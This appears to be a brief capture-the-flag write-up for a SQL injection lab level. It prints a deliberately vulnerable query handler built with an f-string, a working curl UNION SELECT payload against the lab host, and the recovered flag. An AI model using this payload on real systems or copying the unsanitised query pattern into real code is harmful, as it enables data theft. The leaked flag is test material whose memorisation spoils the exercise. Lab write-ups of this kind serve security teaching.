Level 5

We are given with a task of Exploit a structured query language injection vulnerability to leak data

As usual we got the machine access and source code access.

 
def level5():
    db.execute(("CREATE TABLE IF NOT EXISTS users AS "
                'SELECT "flag" AS username, ? AS password'),
               (flag,))
 
    query = request.args.get("query", "%")
    users = db.execute(f'SELECT username FROM users WHERE username LIKE "{query}"').fetchall()
    return "".join(f'{user["username"]}\n' for user in users)

We can see that the query is not sanitized and we can use the UNION operator to get the flag.

curl -s -X GET 'http://challenge.localhost/?query=flag" UNION ALL SELECT password FROM users --'

it will retrives the flag

pwn.college{IvXTaIYF_kFjcQlW7YfGlT_cgMz.dFTOzMDL0IzMyMzW}

level4 level6